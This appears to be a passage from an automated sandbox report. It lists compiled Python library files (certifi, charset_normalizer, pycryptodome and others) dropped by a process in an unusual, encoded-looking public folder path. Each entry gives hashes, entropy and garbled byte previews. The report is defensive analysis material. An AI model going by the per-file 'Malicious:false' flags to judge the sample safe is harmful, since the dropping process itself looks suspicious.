                                                                                                                                                                                      SHA1:E956C6E08533AEFFECB26E61D12CAE4D10D38AD9
                                                                                                                                                                                      SHA-256:0A4EF52AB40D320AEDD714B7A8BAAC8170B24C58D44607FF1873CBE4D13CE596
                                                                                                                                                                                      SHA-512:F52AAD4AB0FFFBBA045BEAC6CBD021E867F49BB6E26164462F71BD6051C6163EA8FF7EDA463580447E837A18BC9B0AB93D9D610F78AAD89FA28F649935D3CF9C
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........fz........................@...sX...d.Z.d.d.l.Z.d.d.l.Z.e.j.d...d.k.r[d.d...Z.d.d...Z.d.d...Z.d.d...Z.d0d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d.l.m.Z...e.Z.d.d.l.m.Z...e.Z.d.d...Z.d.d...Z.d.d...Z.e...d.e.f.d.d.i...Z.e.Z.nId d...Z.d!d...Z.d"d...Z.d#d...Z.d0d$d...Z.d%d...Z.d&d...Z.d'd...Z.d.d(l.m.Z...d.d.l.m.Z...d.d)l.m.Z...e.Z.d*d...Z.d+d...Z.d,d...Z.d.d-l.m.Z...e.Z.d.d/..Z.[.[.d.S.)1a....Compatibility code for handling string/bytes changes from Python 2.x to Py3k..In Python 2.x, strings (of type ''str'') contain binary data, including encoded.Unicode text (e.g. UTF-8). The separate type ''unicode'' holds Unicode text..Unicode literals are specified via the u'...' prefix. Indexing or slicing.either type always produces a string of the same type as the original..Data read from a file is always of '''str'' type...In Python 3.x, strings (type ''str'') may only contain Unicode text. The u'...'.prefix and the ''unicode'' type are now redundant. A new type (called.''bytes'') has to b
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3258
                                                                                                                                                                                      Entropy (8bit):5.105906166864861
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:NYjdkxR/B0sI/LU/kwf+RDQ+XfxGRrccFVQuWP/Z6mQaG8PR02B4Ho4Uw7sR:+xkv/3WLJwyJforccFuz/Z6CG8G1hW
                                                                                                                                                                                      MD5:DAEAD0B028EF37D6B3A42C7F1ED48672
                                                                                                                                                                                      SHA1:C4C513572A7B2BC634AAD302D3C21319D16113EC
                                                                                                                                                                                      SHA-256:8675F4C734F23C631134C318F01B457D2970979446CD2B5F9F53A342E22B1B59
                                                                                                                                                                                      SHA-512:36599A30163DFF9EFDD7A44052BE00BCE6FCFF13B061B4DE928DA733E371973391C706E97E46D14BA83BB06DE1C35D227519250BC0C54BD7DB7D998DEA97BE16
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.........................@...sJ...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.d.d...Z.d.d.d...Z.d.d.d...Z.d.d...Z.d.S.)......)...load_pycryptodome_raw_lib..c_size_t..create_string_buffer..get_raw_buffer..c_uint8_ptr..is_writeable_bufferz.Crypto.Util._strxoray.... void strxor(const uint8_t *in1,. const uint8_t *in2,. uint8_t *out, size_t len);. void strxor_c(const uint8_t *in,. uint8_t c,. uint8_t *out,. size_t len);. Nc....................C...s....t.|...t.|...k.r.t.d.....|.d.u.r.t.t.|.....}.n.|.}.t.|...s!t.d.....t.|...t.|...k.r1t.d.t.|.........t...t.|...t.|...t.|...t.t.|.........|.d.u.rKt.|...S.d.S.).a....From two byte strings of equal length,. create a third one which is the byte-by-byte XOR of the two... Args:. term1 (bytes/bytearray/memoryview):. Th
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):429
                                                                                                                                                                                      Entropy (8bit):5.1601594076577095
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6:y/LllGtYB21NXYvAL/tdxmAfTwAvrXGl/llYlekkvuPllf8uaHxEM9ArMDPb9tuo:CRlCY6ovkxNXjkkU48Vlhf9oyF
                                                                                                                                                                                      MD5:4A9BADA14F62DBF16041DF68C8C520DA
                                                                                                                                                                                      SHA1:207C6E4B2DD19D9D8771F79773F1F643F8DFA860
                                                                                                                                                                                      SHA-256:BF69AEF92A238EF1C25E2BE9CF6BA71006AFEE5685D193B9593022FCB38A726F
                                                                                                                                                                                      SHA-512:31F1FCCF6524311E1C711862E257FB065AF0C4D6056A1DD6AF31F07C79AF69892D022C5771CDAB35341089AA7AD626F6E3AA4EEE26173429DD3BD321BBE9B9D1
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.........................@...s$...g.d...Z.d.Z.d...d.d...e.D.....Z.d.S.).).Z.CipherZ.Hash..ProtocolZ.PublicKeyZ.Util..Signature..IOZ.Math).............0...c....................C...s....g.|.].}.t.|.....q.S...)...str)....0..xr....r.....AC:\Users\Public\QExvbmVOb25l\lib\site-packages\Crypto\__init__.py..<listcomp>....s......r....N)...__all__..version_info..join..__version__r....r....r....r......<module>....s..........
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):7565
                                                                                                                                                                                      Entropy (8bit):5.077960620041668
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:CcgPE5vVnnqs8NYd7pqqx0H/8qq/xqqqRuLMJXHge3YbkqZPqqq3KqUCwqEMlkgM:iyvVnnqs+67pqqx0H/8qq/xqqqRuLMXC
                                                                                                                                                                                      MD5:F1B3F48EEC933CE3FFBF04D9491C7030
                                                                                                                                                                                      SHA1:D17D3E671239F251D4AC41FE7D131ECFF54FE30A
                                                                                                                                                                                      SHA-256:0B47CD1E081140003F145547AB73754801F8C5D7996F6D66B1408A3F5508A652
                                                                                                                                                                                      SHA-512:466A695F9C72ED87A2425BE5C776BAF9A51ACC82F86AF6D93D8C033589C6F3DF9DC76E6F26A893E9701694C3BEA1334B8C01F1674925121FE30BC4B0C7B8DD83
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.........................@...s....d.d.l.Z.d.d.l.Z.d.e.j.v.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.G.d.d...d...Z.G.d.d...d...Z.e.j.D.].Z.e.e.d.e.....e.j.....q2e...Z.d.d...Z.G.d.d...d...Z.d.d...Z.d.d...Z.d.S.)......NZ.__pypy__c....................C...s6...d.t.j.v.r.d.S.t.r.t.j.d.k.r.d.S.d.d.l.}.|...d.....d.S.).N..distutils)...........r....a....Distutils was imported before Setuptools, but importing Setuptools also replaces the `distutils` module in `sys.modules`. This may lead to undesirable behaviors or errors. To avoid these issues, avoid using distutils directly, ensure that setuptools is installed in the traditional way (e.g. not an editable install), and/or make sure that setuptools is always imported before distutils.)...sys..modules..is_pypy..version_info..warnings..warn).r......r.....JC:\Users\Public\QExvbmVOb25l\lib\site-packages\_distutils_hack\__init__.py..warn_distutils_present....s....................r....c....................C...sF...d.t.j.v.r.d.S.d.d.l.}.|...
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):272
                                                                                                                                                                                      Entropy (8bit):5.097538040202817
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6:y/AJteNbsZvEG/Xg6nCbWjN2o3IaHxEM9Arsq4G:CAjeNQeGVN2ojlBq7
                                                                                                                                                                                      MD5:92F03D402A2988001BDEDB93D73BD709
                                                                                                                                                                                      SHA1:27785FB8BA5DB650F11E3A90BCD5F1326C956902
                                                                                                                                                                                      SHA-256:B795AFDAB8365E5C9193A7C44ED397B36A5C3BFBDAAB9D587A53CE239BF5A0D0
                                                                                                                                                                                      SHA-512:0D327CCA763A4920B65D437A5ABB072D8D7D243880281E2E8AF5A5467A90733C8D974F10AD256BE1CDB427F206FE2AD1EECC0D97CBEF768C6ECA6A4719B887A3
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......?..f^........................@...s ...d.d.l.m.Z.m.Z...d.d.g.Z.d.Z.d.S.)......)...contents..wherer....r....z.2024.08.30N)...corer....r......__all__..__version__..r....r.....BC:\Users\Public\QExvbmVOb25l\lib\site-packages\certifi\__init__.py..<module>....s..........
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2103
                                                                                                                                                                                      Entropy (8bit):4.948477442954396
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:tNBUoxmgDZLaFAl/g95K3Q8+epPUHq7J8nH:dUC/mcg955epA1H
                                                                                                                                                                                      MD5:1DD8E7AAB24773A886ACA66D0C34B858
                                                                                                                                                                                      SHA1:452361889D3B8117924A4F5715891A6FAE81A3E5
                                                                                                                                                                                      SHA-256:BE908C0F0FFB373A545E6D830FDF9CD690FD0B8F5A5E3AAF0D4BED5F156C2069
                                                                                                                                                                                      SHA-512:AB99225657C56D039C2A9F39C4EE682243B493E6F19A683568B96B7F1AC4B4C9C23334095A4F2A8862F028B109590E7C1E66F9C56BB3393E22111A8CB2E973B4
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......?..fJ........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.d...Z.e.j.d.k.r0d.d.l.m.Z.m.Z...d.a.d.a.d.e.f.d.d...Z.d.e.f.d.d...Z.d.S.e.j.d.k.rQd.d.l.m.Z.m.Z...d.a.d.a.d.e.f.d.d...Z.d.e.f.d.d...Z.d.S.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...e.e.j.e.f...Z.e.e.d.f...Z.....d.d.e.d.e.d.e.d.e.d.e.f.d.d...Z.d.e.f.d.d...Z.d.e.f.d.d...Z.d.S.).ze.certifi.py.~~~~~~~~~~..This module returns the installation location of cacert.pem or its contents.......N..returnc....................C...s....t...d.d.d.....d.S.).N)..._CACERT_CTX..__exit__..r....r.....>C:\Users\Public\QExvbmVOb25l\lib\site-packages\certifi\core.py..exit_cacert_ctx....s......r....)...........)...as_file..filesc....................C...s4...t.d.u.r.t.t.d.....d.....a.t.t.......a.t...t.....t.S...N..certifi..cacert.pem)..._CACERT_PATHr....r......joinpathr......str..__enter__..atexit..registerr....r....r....r....r......where....s..............r....c....................C...s....t.d.....d...j.d.d...S...Nr....r......ascii....encoding).r....r......r
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1568
                                                                                                                                                                                      Entropy (8bit):5.709452859356648
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:oV4U0b8ybWPxg+QQMzy/ClB3N/PLo3bIB3Nvh4VMhGlXwu+H2C/4PvBGJOcug/BA:A4jbqjQtyat/c2vhCMhju/C/yv+K2eUy
                                                                                                                                                                                      MD5:6A2C7AC20CDFA210BF2BE6A9242CAE14
                                                                                                                                                                                      SHA1:AC8E8A1D9B4C39813EE3D77088A49A5B9DF8CE3D
                                                                                                                                                                                      SHA-256:2C4C72594F11E38674EA85E75EAA410405439D21DFD92F8B65AD9ACE8A921F01
                                                                                                                                                                                      SHA-512:CB6713602BAD7FBD464FAD0A1E6BB6D60339F98B900029F0ECFD1455054FEBF206DEEC6BA5647AFC2DF397EAFCED8478880F2AA2FDF89FEBA33884FA28418ABF
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......>..fW........................@...sx...d.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.Z.e...d.....e.........d.S.).u.....Charset-Normalizer.~~~~~~~~~~~~~~.The Real First Universal Charset Detector..A library that helps you read text from an unknown charset encoding..Motivated by chardet, This package is trying to resolve the issue by taking a new approach..All IANA character set names for which the Python core library provides codecs are supported...Basic usage:. >>> from charset_normalizer import from_bytes. >>> results = from_bytes('B.... ..... ... ..... .. ............ O............!'.encode('utf_8')). >>> best_guess = results.best(). >>> str(best_guess). 'B.... ..... ... ..... .. ............ O............!'..Others methods and usages are available - see the full documentation.at <https://github.com/Ousret/charset_normalizer>..:copyright
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):11385
                                                                                                                                                                                      Entropy (8bit):5.821640867954899
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:OWeJLd8V6fySfPAraft774k4M1Cz9ZZERmOBJnCTrFkYAr64BpmA+ifAgQSK5FQm:OWeJLdcS7ft77cZZaLnCvNm64mA+ifA9
                                                                                                                                                                                      MD5:983C6602469917B07BE91A3470625875
                                                                                                                                                                                      SHA1:FE9E447441B16B40662CEB1A98CB7408B025BB2C
                                                                                                                                                                                      SHA-256:F9BB8EC9004A94D07BD22FA0D8E5918A2BBB76DB28C1F98B8E1ED7DA8DC38722
                                                                                                                                                                                      SHA-512:72FF2A71CCE2AEACFAE8CEEFEEE9C9BE48BB00D63512492395B799E462CD1B955535A41576965E95434993691EF5C78B66CB071932075AE289D5A35B5523733C
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......>..f.T.......................@...sL...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.. d...Z!e.."..Z#e#.$e..%d.........................d(d.e.e&e'f...d.e(d.e(d.e)d.e.e.e*....d.e.e.e*....d.e+d.e+d.e)d.e+d.e.f.d.d...Z,..................d(d.e.d.e(d.e(d.e)d.e.e.e*....d.e.e.e*....d.e+d.e+d.e)d.e+d.e.f.d d!..Z-..................d(d"e.e*e&e.f...d.e(d.e(d.e)d.e.e.e*....d.e.e.e*....d.e+d.e+d.e)d.e+d.e.f.d#d$..Z...................d)d%e.e.e*e.e&f...d.e(d.e(d.e)d.e.e.e*....d.e.e.e*....d.e+d.e+d.e)d.e+d.e+f.d&d'..Z/d.S.)*.....N)...PathLike)...BinaryIO..List..Optional..Set..Union.....)...coherence_ratio..encoding_languages..mb_encoding_languages..merge_coherence_ratios)...IANA_SUPPORTED..TOO_BIG_SEQUENCE..TOO_SMALL_SEQUENCE..TRACE)...mess_ratio)...CharsetMatch..CharsetMatches)...any_specified_encoding..cut_sequence_chunks..iana_name..identify_sig_or_bom..is_cp_similar..is_multi_b
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):9646
                                                                                                                                                                                      Entropy (8bit):5.5173709961220645
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:6q59eApoIRl8if8rZ+IjfsmspqbQO0opPc7HPM4pOfXntTatDlA5u4ZBTWm:V5FTf8rkmypO0iPc7Hk4pOfXnQJlYuOB
                                                                                                                                                                                      MD5:95332C512D3C08D71872DDE640372179
                                                                                                                                                                                      SHA1:6184FC2DEC17CB31640D174D59BAA2C90BA7CB68
                                                                                                                                                                                      SHA-256:28BC1A24776BD14D202015C169EB80A18A8D62089E3B6817C59C49CECF0971C7
                                                                                                                                                                                      SHA-512:49F115EAA62100360C48684A59022074CCEB7290B9C8222AB84B07A4AEE69C9E918F7CC108E45F5E7EC1674BFFA6601C6C24D16A4A4293503C39147FDFC7AB4B
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......>..f.2.......................@...s....d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.e.d.e.e...f.d.d...Z.d.e.d.e.e...f.d.d...Z.e...d.e.d.e.e...f.d.d.....Z e...d.e.d.e.e...f.d.d.....Z!e.e.d...d.e.d.e.e"e"f...f.d.d.....Z#..d0d.e.e...d.e"d.e.e...f.d.d...Z$d.e.d.e.e...d.e%f.d d!..Z&d"e.d.e.e...f.d#d$..Z'd%e.e...d.e.f.d&d'..Z(d%e.d.e.f.d(d)..Z)e.d*d.....d1d"e.d,e%d-e.e...d.e.f.d.d/....Z*d.S.)2.....N)...IncrementalDecoder)...Counter)...lru_cache).r......Dict..List..Optional..Tuple.....)...FREQUENCIES..KO_NAMES..LANGUAGE_SUPPORTED_COUNT..TOO_SMALL_SEQUENCE..ZH_NAMES).. is_suspiciously_successive_range)...CoherenceMatches)...is_accentuated..is_latin..is_multi_byte_encoding..is_unicode_range_secondary..unicode_range..iana_name..returnc........................s....t.|...r.t.d.....t...d...|.....j.}.|.d.d...}.i...d...t.d.d...D.]/}.|...t.|.g.....}.|.rNt.|...}.|.d.u.r4q.t.|...d.u.rN|...
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):30434
                                                                                                                                                                                      Entropy (8bit):5.881610823760447
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:qvZKN0taqbKcwF7wuCDa5NIbpp2dmnFu3GJusAVlufzR7c:qvZ6EKcR7G3uP8g8luft7c
                                                                                                                                                                                      MD5:184B146FDAEB47592DDE6520CC769D2C
                                                                                                                                                                                      SHA1:B26619E2090A772EB7885D35EA13AB8DA9DCA146
                                                                                                                                                                                      SHA-256:7F0886D55A682379AB50FFF670502F2C76B5F3AA0C50511B72E09E1675591CF9
                                                                                                                                                                                      SHA-512:1CD5C3149BCBB62D248F019BC6633FBE513B6BFCC3B4A32920B2B180AE5A31145FD6BDA8094ABD7FFF7D36259E41E5B719990C71ED65EE9227602C106CED8AA7
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......>..f........................@...s~...U.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...e.g.d...d.e.e.g.e.e.g.d...Z.e.e.e.e.e.e...f...f...e.d.<.d.Z.e.e.d.<.e.d...Z.e.e.d.<.d.Z.e.e.d.<.i.d.e.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d e.d.d!....d"e.d!d#....d$e.d#d%....d&e.d%d'....d(e.d'd)....d*e.d)d+....d,e.d+d-....d.e.d-d/....i.d0e.d/d1....d2e.d1d3....d4e.d3d5....d6e.d5d7....d8e.d7d9....d:e.d9d;....d<e.d;d=....d>e.d=d?....d@e.d?dA....dBe.dAdC....dDe.dCdE....dFe.dEdG....dHe.dGdI....dJe.dIdK....dLe.dKdM....dNe.dMdO....dPe.dOdQ......i.dRe.dQdS....dTe.dSdU....dVe.dUdW....dXe.dWdY....dZe.dYd[....d\e.d[d]....d^e.d]d_....d`e.d_da....dbe.dadc....dde.dcde....dfe.dedg....dhe.dgdi....dje.didk....dle.dkdm....dne.dmdo....dpe.dodq....dre.dqds......i.dte.dsdu....dve.dudw....dxe.dwdy....dze.dyd{....d|e.d{d}....d~e.d}d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d...
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1834
                                                                                                                                                                                      Entropy (8bit):5.510079891018974
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:owwE8mcebSh3Ue75yubxeNOhsV4Me+NK29:owAmcebSyo5yc4NFV4Me+Nn
                                                                                                                                                                                      MD5:CE5739AC4A83CF18DDE2541086918D91
                                                                                                                                                                                      SHA1:CE199819AEA1EAC78114C477AF2568D892F17256
                                                                                                                                                                                      SHA-256:9DD8259AAB877C489B141B8F9E31D4BA829AF873FF8A7CC8AF8893773F58FD25
                                                                                                                                                                                      SHA-512:EDB71150D04678FA92E8EE35704AA062E9500A050FCE9C331A321A1EBE39F506FA66D5C54529D7C030B272D8377538A4145DFEBEE479C6B7F9F6D82FC12022D4
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......>..fM........................@...sr...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....d.d.e.d.e.d.e.d.e.e.e.e.e.e.f.....f...f.d.d...Z.d.S.)......)...Any..Dict..Optional..Union)...warn.....)...from_bytes)...CHARDET_CORRESPONDENCEF..byte_str..should_rename_legacy..kwargs..returnc....................K...s....t.|...r.t.d.d...t.|...........d.......t.|.t.t.f...s#t.d...t.|.........t.|.t...r,t.|...}.t.|.......}.|.d.u.r9|.j.n.d.}.|.d.u.rG|.j.d.k.rG|.j.n.d.}.|.d.u.rRd.|.j...n.d.}.|.d.u.rc|.d.k.rc|.j.rc|.d.7.}.|.d.u.ro|.t.v.rot.|...}.|.|.|.d...S.).aJ.... chardet legacy method. Detect the encoding of the given byte string. It should be mostly backward-compatible.. Encoding name will match Chardet own writing whenever possible. (Not on encoding name unsupported by it). This function is deprecated and should be used to migrate your project easily, consult the documentation for. further information. Not planned for removal... :param byte_str: The byte seque
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):11529
                                                                                                                                                                                      Entropy (8bit):5.174314918222234
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:N3OucwM2HQVZI3mkrM0Af4/W7QeyRhhpermRK+pQCBdjWdIq:NeuvM2HQVZIjrdAf4eSvhpeKc+iCHWdD
                                                                                                                                                                                      MD5:9B0C0FCAF5CB5FF7C0D4D23E83DE35A3
                                                                                                                                                                                      SHA1:7137C75E29FADCB8E8AE6A4279805D6EB86C3E0C
                                                                                                                                                                                      SHA-256:E03827CFFB94785EB9C72A2F1CA5BCD342FF6A8197237FA7614BA1C69917DBD6
                                                                                                                                                                                      SHA-512:E25D99A30A6A055F2C3403604157964DC98D81D6549BFDBA26ED42CEB9C52442B9CE10AF4EEB2F34B40E03AFC0CFDAF3FD47229CAA01360BE52E0A35B4658F6D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......>..f.........................@...s....d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...G.d.d...d...Z.G.d.d...d...Z.e.e.e.f...Z.e.e...Z.G.d.d...d...Z.d.S.)......)...aliases)...sha256)...dumps)...Any..Dict..Iterator..List..Optional..Tuple..Union.....)...TOO_BIG_SEQUENCE)...iana_name..is_multi_byte_encoding..unicode_rangec....................@...s....e.Z.d.Z...d=d.e.d.e.d.e.d.e.d.d.d.e.e...f.d.d...Z.d.e.d.e.f.d.d...Z.d.e.d.e.f.d.d...Z.e.d.e.f.d.d.....Z.d.e.f.d.d...Z.d.e.f.d.d...Z.d>d.d...Z.e.d.e.f.d.d.....Z.e.d.e.e...f.d.d.....Z.e.d.e.f.d.d.....Z.e.d.e.f.d.d ....Z.e.d.e.e...f.d!d"....Z.e.d.e.f.d#d$....Z.e.d.e.f.d%d&....Z.e.d.e.f.d'd(....Z.e.d.e.f.d)d*....Z.e.d.e.f.d+d,....Z.e.d.e.f.d-d.....Z.e.d.e.d...f.d/d0....Z.e.d.e.f.d1d2....Z.e.d.e.e...f.d3d4....Z.e.d.e.e...f.d5d6....Z d?d8e.d.e.f.d9d:..Z!e.d.e.f.d;d<....Z"d.S.)@..CharsetMatchN..payload..guessed_encoding..mean_mess_ratio..has_sig_or_bom..languages..CoherenceMatches..decod
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):8910
                                                                                                                                                                                      Entropy (8bit):5.468569742044088
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:HnaWkveyNwQTpaKOvKDqBd9KkzZYozi7WHLuo8+bautNZo87Yf2sfGdrB6bQPTIT:kvk+DqBNzk7yuoXbvLZDYfhGdpr4FFv
                                                                                                                                                                                      MD5:8E583B0A3D9CF5F04EBAB23E1351B63E
                                                                                                                                                                                      SHA1:C82BF7D3DCABF3329386A607CAB4AF23509A7F49
                                                                                                                                                                                      SHA-256:B84FAC0DC08B16AAC4072CED7151B2C8A5D6701900DB7105728E9E81E5245E9A
                                                                                                                                                                                      SHA-512:594DF43E72B8317B496155894D42BFD260CC37B5749D0BE56AE4D5FDBEF1BB8461DA9F2298568E1977B4626C944D4AA87350BE9D984778D2BD6C940E88EC7754
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......>..f.0.......................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.e.d...d.e.d.e.f.d.d.....Z.e.e.d...d.e.d.e.f.d.d.....Z.e.e.d...d.e.d.e.e...f.d.d.....Z.e.e.d...d.e.d.e.f.d.d.....Z e.e.d...d.e.d.e.f.d.d.....Z!e.e.d...d.e.d.e.f.d.d.....Z"e.e.d...d.e.d.e.f.d.d.....Z#e.e.d...d.e.d.e.f.d.d.....Z$e.e.d...d.e.d.e.f.d.d.....Z%e.e.d...d.e.d.e.f.d.d ....Z&e.e.d...d.e.d.e.f.d!d"....Z'e.e.d...d.e.d.e.f.d#d$....Z(e.e.d...d.e.d.e.f.d%d&....Z)e.e.d...d.e.d.e.f.d'd(....Z*e.e.d...d.e.d.e.f.d)d*....Z+e.e.d...d.e.d.e.f.d+d,....Z,e.e-e...d...d-e.d.e.f.d.d/....Z.e.e.d...d.e.d.e.f.d0d1....Z/d_d3e0d4e1d.e.e...f.d5d6..Z2e.d7d...d8e.d.e.f.d9d:....Z3d3e0d.e.e.e...e0f...f.d;d<..Z4d=e.d.e.f.d>d?..Z5d`dAe.dBe.d.e.f.dCdD..Z6dEe.d.e.e...f.dFdG..Z7dHe.dIe.d.e8f.dJdK..Z9dHe.dIe.d.e.f.dLdM..Z:dNe.j;dOf.d8e.dPe1dQe.d.d.f.dRdS..Z<..dadTe0dUe.dVe=dWe1dXe.dYe.dZe0d[e.d\e.e...d.e.e.d.d.f...f.d]d^
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):254
                                                                                                                                                                                      Entropy (8bit):5.300756479627271
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6:y/BGt/z/Oszurb64bJf+uaHxEM9ArsQx6G3D8Isi:CQ/z/OsJaJwlBQ8GT8Iv
                                                                                                                                                                                      MD5:E4000410CF40C2B2FA3F2491B04A9B58
                                                                                                                                                                                      SHA1:491ECDE66A6F7BDE1E8CE10E5F23410AE7F1FF0D
                                                                                                                                                                                      SHA-256:2AB5CA783723F2BB0186DFEAA70B8562FB3FB9730F64D8443B0E31E52884A37E
                                                                                                                                                                                      SHA-512:D4DCD22266C7A62ECE27DE4327D915CE0F8766E458F434516AED6C42A8E76EDAA0295A20A466F6F3211B4FA13BCBB8AE5E0A0F3A55876DB82D8F9784549FE7CD
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......>..fU........................@...s....d.Z.d.Z.e...d...Z.d.S.).z..Expose version.z.3.3.2...N)...__doc__..__version__..split..VERSION..r....r.....LC:\Users\Public\QExvbmVOb25l\lib\site-packages\charset_normalizer\version.py..<module>....s..........
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):820
                                                                                                                                                                                      Entropy (8bit):5.105060865619361
                                                                                                                                                                                      Encrypted:false
